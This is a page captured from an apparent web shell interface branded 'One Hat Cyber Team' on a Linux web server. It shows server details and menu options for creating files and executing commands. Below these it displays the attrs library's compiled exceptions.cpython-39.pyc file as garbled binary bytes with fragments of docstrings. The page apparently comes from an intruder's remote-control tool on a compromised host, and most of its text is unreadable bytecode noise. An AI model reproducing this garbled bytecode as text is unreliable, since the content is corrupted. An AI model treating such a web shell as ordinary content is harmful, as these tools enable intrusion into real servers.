⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.24
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.9
/
site-packages
/
attr
/
__pycache__
/
View File Name :
exceptions.cpython-39.pyc
a PÍ£_ž ã @ s¨ d dl mZmZmZ G dd„ deƒZG dd„ deƒZG dd„ deƒZG dd „ d eƒZ G d d„ deƒZ G dd „ d eƒZG dd„ deƒZ G dd„ deƒZG dd„ deƒZdS )é )Úabsolute_importÚdivisionÚprint_functionc @ s e Zd ZdZdZegZdS )ÚFrozenErrorzï A frozen/immutable instance or attribute haave been attempted to be modified. It mirrors the behavior of ``namedtuples`` by using the same error message and subclassing `AttributeError`. .. versionadded:: 20.1.0 zcan't set attributeN)Ú__name__Ú __module__Ú__qualname__Ú__doc__ÚmsgÚargs© r r ú3/usr/lib/python3.9/site-packages/attr/exceptions.pyr s r c @ s e Zd ZdZdS )ÚFrozenInstanceErrorz\ A frozen instance has been attempted to be modified. .. versionadded:: 16.1.0 N©r r r r r r r r r s r c @ s e Zd ZdZdS )ÚFrozenAttributeErrorz] A frozen attribute has been attempted to be modified. .. versionadded:: 20.1.0 Nr r r r r r s r c @ s e Zd ZdZdS )ÚAttrsAttributeNotFoundErrorzq An ``attrs`` function couldn't find an attribute that the user asked for. .. versionadded:: 16.2.0 Nr r r r r r # s r c @ s e Zd ZdZdS )ÚNotAnAttrsClassErrorzi A non-``attrs`` class has been passed into an ``attrs`` function. .. versionadded:: 16.2.0 Nr r r r r r + s r c @ s e Zd ZdZdS )ÚDefaultAlreadySetErrorzˆ A default has been set using ``attr.ib()`` and is attempted to be reset using the decorator. .. versionadded:: 17.1.0 Nr r r r r r 3 s r c @ s e Zd ZdZdS )ÚUnannotatedAttributeErrorz~ A class with ``auto_attribs=True`` has an ``attr.ib()`` without a type annotation. .. versionadded:: 17.3.0 Nr r r r r r <